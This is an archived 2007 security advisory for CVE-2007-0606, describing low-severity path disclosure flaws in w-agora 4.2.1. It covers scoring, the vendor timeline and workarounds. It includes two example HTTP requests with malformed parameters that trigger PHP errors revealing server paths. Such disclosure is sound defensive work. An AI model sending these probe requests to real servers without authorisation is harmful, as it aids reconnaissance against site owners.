netVigilance Vulnerability intelligence since 2004

Archived document Original netVigilance advisory, published March 16 2007. Preserved as published — the advisory text and version numbers are unchanged; it is shown here converted from the original HTML page.

advisory0014 · CVE-2007-0606 · published 2007-03-16

w-agora version 4.2.1 Multiple Path Disclosure Vulnerabilities

archived risk: low

Current status

This advisory describes a vulnerability from 2007. It is not in the CISA Known Exploited Vulnerabilities catalog and there is no active remediation deadline. The page is kept online because other security databases link to it.

CVE reference CVE-2007-0606
In KEV catalog no
Affected software w-agora version 4.2.1
Captured from netvigilance.com

Original document

Reproduced as it was published, including the advisory numbering, scoring and the disclosure timeline used at the time.

converted from html as published 2007-03-16
Description:

w-agora is a set of scripts written in PHP. This package is intended to allow users to share, exchange and publish information, files and discussions over the web.

Multiple path disclosure vulnerabilities allow the attacker to disclose the true path of the server-side scripts.

External References:
Mitre CVE: CVE-2007-0606
NVD NIST: CVE-2007-0606
OSVDB: 31668
OSVDB: 31669

Summary:
w-agora is a set of scripts written in PHP intended to allow users to share, exchange and publish information, files and discussions over the web.

Security issues in the product allow attackers to gather the true path of the server-side scripts.

This vulnerabilities can be exploited only when PHP register_globals is On.

Release Date:
March 16 2007

Severity:
Risk: Low

CVSS Metrics
Access Vector: Remote
Access Complexity: High
Authentication: not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 1.86

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated

Vulnerability Impact: Attack
Host Impact: Path disclosure.

SecureScout Testcase ID:
TC 17941

Vulnerable Systems:
w-agora version 4.2.1

Vulnerability Type:
Program flaw - The delete_forum.php and index.php scripts have flaws which lead to Warnings or even Fatal Errors.

Vendor Status:
Author Marc Druilhe.

The Vendor has been notified on January 30th 2007, and has not responded.

Workaround:
Set PHP register_globals to Off.

Disable warning messages: modify in the php.ini file following line: display_errors = Off.

Or modify .htaccess file (this will work only for the apache servers).

Example:

Path Disclosure Vulnerability 1 :

REQUEST http://[TARGET]/[w-agora-directory]/index.php?bn[]=1

REPLY
...

Warning: basename() expects parameter 1 to be string, array given in http://[TARGET]/[w-agora-directory]\index.php on line 29
ERROR_NO_CONFIG_FILEconf/site_agora.php
...

Path Disclosure Vulnerability 2 :

REQUEST http://[TARGET]/[w-agora-directory]/delete_forum.php?remove_site=1&cfg_dir=1&bn=1&ext=1&bn=&site_cfg_file=1

REPLY
...

Fatal error: Call to undefined function: msgform() in http://[TARGET]/[w-agora-directory]\delete_forum.php on line 22

...

Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
Original URL: /advisory0014.html · preserved at the same address

Why this page still exists

Advisories published between 2004 and 2015 are referenced by vulnerability databases, academic papers and mailing list archives. Removing them would break those references, so every advisory keeps its original address and its original text. Nothing on this page has been rewritten to match current practice.